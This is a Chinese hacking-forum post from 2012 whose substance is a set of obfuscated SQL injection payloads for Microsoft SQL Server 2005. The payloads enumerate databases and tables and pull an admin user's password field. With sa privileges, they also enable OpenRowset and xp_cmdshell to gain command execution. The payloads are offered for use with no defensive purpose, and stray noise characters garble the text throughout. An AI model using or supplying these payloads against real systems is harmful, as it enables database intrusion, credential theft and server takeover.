找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2346|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
0 F" Z5 t. H+ l7 v' b, e: b% k

. x9 X/ q8 ?! a! a, u) Z2 C
- j) |& `" ~1 A[Copy to clipboard]CODE:  s6 Y& O. o+ P. t( u! h- V
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--% Y$ \  n3 n- E9 b- M! E
. p% r) y" Q0 Y; m5 C( p
爆表语句,somedb部份是所要列的数据库,红色数字1累加
% c% Y8 `5 t' r
" E  i- M0 e" V1 G" ]. ^5 P2 c2 Q' _0 Z7 \. h
[Copy to clipboard]CODE:
1 i, |' b) I9 J5 e3 E0 R% I/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
4 d# B! f' V# Q' d
# q. V# u$ z" O. X7 S爆字段语句,爆表admin里user='icerover'的密码段
/ n+ m" J/ O- g' Q. @- v  u6 v
% s6 u9 Q3 s7 C3 B# s3 K; h! o. B4 M' m( x% @
[Copy to clipboard]CODE:
* U- i9 C) f3 q5 B**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
6 ]& t- n. U$ i6 |& N
* a$ t. }* l! Q3 v- d1 e% ^( L1 amssql2005默认没有开xp_cmdshell的,openrowset也不能用
/ d" A( W' Y( |$ w: ]( t如果是sa权限,可以这样来开启- V) i( B- ]% A
开启openrowset$ H( b# F. Y# ]) ?

: y0 T4 ]" \9 S. f6 O# j8 d6 i" C3 d, Y) n
[Copy to clipboard]CODE:
6 N$ l% {1 `4 n/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
) j: v/ c5 I0 z' ]( q: P6 w9 U/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
  x% P. K7 Q0 }8 l3 o' F1 G% |# ^( ?: q/ Y. f  P7 ^8 ]
开启xp_cmdshell( B+ K: u' @+ a! \6 _7 c) t

7 k) H) @: u* j! K, Q
$ ?& }$ u' B; C  y7 n0 _[Copy to clipboard]CODE:  a" d" d5 Q+ M8 _
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
/ X% U- G/ i& E7 P3 i/ R( _9 hEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--- K' a) q% [# |8 v  ~) k
+ `- t/ `( s9 t- q  p
ok,over~~晚安5 H- k1 N* }1 }# {; g4 X1 u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表